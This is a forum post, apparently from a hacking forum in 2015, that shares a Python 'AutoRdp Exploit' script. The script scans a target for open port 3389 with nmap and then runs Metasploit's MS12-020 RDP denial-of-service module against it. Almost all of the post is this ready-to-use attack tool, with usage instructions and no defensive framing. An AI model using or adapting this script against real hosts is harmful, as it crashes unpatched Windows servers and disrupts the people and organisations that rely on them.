Active Members Fi8sVrs Posted January 5, 2015 Active Members Report Share Posted January 5, 2015 [!] Author - Muhammad Adeel aka Stoker[!] Mail - jutthaxor@gmail.com[!] Greetz - Team Xploiters[!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <='''#!/usr/bin/python# jutthaxor@gmail.comimport os,sys,re,subprocessprint '''+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+|R|d|p| |A|u|t|o|E|x|p|l|o|i|t| |B|y| |S|t|o|k|e|r|+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+[!] Author - Muhammad Adeel aka Stoker[!] Mail - jutthaxor@gmail.com[!] Greetz - Team Xploiters[!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <='''if os.getuid() != 0: print '\n\t\t[unSufficient Priviliges]Error:You are Not Root!\n' sys.exit(1)def help(): if len(sys.argv) != 2: print """ [!]Usage - ./script.py [Target Host] [!]Example - ./script.py 127.0.0.1\n""" sys.exit(1)help()RHOST = sys.argv[1]nmap = subprocess.Popen('nmap -p3389 %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()nmapresul = open('/tmp/nmap.txt', 'rU')found = nmapresul.read() vulnerability = re.search(r'3389[/]tcp\sopen', found)if not found: print "\n[!] Port 3389 is Close." sys.exit(1)print '\n[!] Port Is Open. Let me try AutoRdp Exploit'metasploit = subprocess.Popen('msfcli auxiliary/dos/windows/rdp/ms12_020_maxchannelids RHOST=%s RPORT=3389 E' %RHOST, shell=True).wait()subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()end = raw_input('Hit Enter to Exit.')Source Quote Link to comment Share on other sites More sharing options...
